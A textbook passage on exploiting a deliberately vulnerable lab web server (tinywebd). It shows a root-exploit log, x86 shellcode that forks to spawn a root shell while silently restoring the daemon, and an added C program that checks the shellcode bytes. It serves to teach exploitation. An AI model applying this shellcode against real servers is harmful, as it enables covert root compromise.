shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (348 b)] [shellcode (53 b)] [ret addr (128 b)]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ ls -l /Hacked
-rw------- 1 root reader 0 2007-09-19 20:37 /Hacked
reader@hacking:~/booksrc $ ps aux | grep tinywebd
root 26787 0.0 0.0 1636 420 ? Ss 20:37 0:00 ./tinywebd
reader 26828 0.0 0.0 2880 748 pts/1 R+ 20:38 0:00 grep tinywebd
reader@hacking:~/booksrc $ ./webserver_id 127.0.0.1
The web server for 127.0.0.1 is Tiny webserver
reader@hacking:~/booksrc $
0x653 Child Laborers
Now that the difficult part is figured out, we can use this technique to silently
spawn a root shell. An interactive shell would block, but we still want the
process to go on handling web requests, so the shellcode needs to fork off a
child process. The fork() call creates a child process that is an exact copy of
the parent, except that fork() returns 0 in the child and the child's process ID
in the parent. We want our shellcode to fork, have the child serve up the root
shell, and have the parent restore tinywebd's execution. In the shellcode below,
several instructions are added to the start of loopback_shell.s. First, the fork
syscall is made, which leaves its return value in EAX. The next two instructions
test whether EAX is zero. If it is, we are in the child and jump to child_process
to spawn the shell. Otherwise, we are in the parent, so the shellcode restores
execution into tinywebd using the same EBP fix-up and return address as the
earlier restore shellcode.
loopback_shell_restore.s
BITS 32
push BYTE 0x02 ; Fork is syscall #2
pop eax
int 0x80 ; After the fork, in child process eax == 0.
test eax, eax
jz child_process ; In child process spawns a shell.
; In the parent process, restore tinywebd.
lea ebp, [esp+0x68] ; Restore EBP.
push 0x08048fb7 ; Return address.
ret ; Return
child_process:
; s = socket(2, 1, 0)
push BYTE 0x66 ; Socketcall is syscall #102 (0x66)
pop eax
cdq ; Zero out edx for use as a null DWORD later.
xor ebx, ebx ; ebx is the type of socketcall.
inc ebx ; 1 = SYS_SOCKET = socket()
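The checks a practitioner runs after bolting a fork prologue onto existing shellcode, as an added C example that is not part of the book: the bytes are hand-assembled from the fragment of loopback_shell_restore.s listed above (an assumption, verify them with nasm before relying on them), the code confirms there are no NUL bytes, that the jz displacement really lands on child_process, and that the pushed return address decodes to 0x08048fb7, and fork_split() shows the same parent/child split in C, with the child doing its own work and exiting while the parent carries on.

```c
#include <stddef.h>
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

/* Bytes hand-assembled from the fragment of loopback_shell_restore.s above.
 * This is an assumption: check them against `nasm loopback_shell_restore.s`.
 * Byte offsets are noted so the jz displacement can be verified. */
static const unsigned char fork_prologue[] = {
    0x6a, 0x02,                   /*  0: push BYTE 0x02          */
    0x58,                         /*  2: pop eax                 */
    0xcd, 0x80,                   /*  3: int 0x80                */
    0x85, 0xc0,                   /*  5: test eax, eax           */
    0x74, 0x0a,                   /*  7: jz child_process (+10)  */
    0x8d, 0x6c, 0x24, 0x68,       /*  9: lea ebp, [esp+0x68]     */
    0x68, 0xb7, 0x8f, 0x04, 0x08, /* 13: push 0x08048fb7         */
    0xc3,                         /* 18: ret                     */
    /* child_process: */
    0x6a, 0x66,                   /* 19: push BYTE 0x66          */
    0x58,                         /* 21: pop eax                 */
    0x99,                         /* 22: cdq                     */
    0x31, 0xdb,                   /* 23: xor ebx, ebx            */
    0x43,                         /* 25: inc ebx                 */
};
#define JZ_OFFSET            7   /* where the 2-byte jz sits         */
#define CHILD_PROCESS_OFFSET 19  /* where the child_process label is */

/* Index of the first 0x00 byte, or -1 if the code is NUL-free. */
int first_null_byte(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0x00)
            return (int)i;
    return -1;
}

/* Target of a short conditional jump: the byte after the 2-byte instruction
 * plus the sign-extended 8-bit displacement. */
int rel8_target(int jump_offset, unsigned char disp)
{
    return jump_offset + 2 + (signed char)disp;
}

/* Little-endian decode of a 32-bit immediate (the pushed return address). */
unsigned int decode_le32(const unsigned char *p)
{
    return (unsigned int)p[0] | (unsigned int)p[1] << 8 |
           (unsigned int)p[2] << 16 | (unsigned int)p[3] << 24;
}

/* No NUL bytes, the jz lands on child_process, and the parent pushes the
 * intended return address. Returns 1 when every check passes. */
int check_fork_prologue(void)
{
    int ok = 1;
    if (first_null_byte(fork_prologue, sizeof fork_prologue) != -1)
        ok = 0;
    if (fork_prologue[JZ_OFFSET] != 0x74 ||
        rel8_target(JZ_OFFSET, fork_prologue[JZ_OFFSET + 1]) != CHILD_PROCESS_OFFSET)
        ok = 0;
    if (decode_le32(&fork_prologue[14]) != 0x08048fb7u)
        ok = 0;
    return ok;
}

/* The fork() split the shellcode relies on, written in C: the child (fork
 * returned 0) does its own work and exits, the parent (fork returned the
 * child's pid) carries on and reaps it. Returns the child's exit status as
 * seen by the parent, or -1 on error. */
int fork_split(int child_status)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* child: this is where the shellcode spawns the shell */
        _exit(child_status & 0xff);
    }
    /* parent: this is where the shellcode restores tinywebd */
    int status;
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    printf("prologue is %zu bytes, child_process at offset %d, checks %s\n",
           sizeof fork_prologue, CHILD_PROCESS_OFFSET,
           check_fork_prologue() ? "pass" : "FAIL");
    printf("parent saw child exit status %d\n", fork_split(42));
    return 0;
}
```

The NUL check is the routine one for any payload that passes through string functions; the jump and return-address checks are the ones that catch a prologue whose length changed after an edit, since a stale rel8 displacement or a mis-ordered immediate silently sends the parent or child somewhere else.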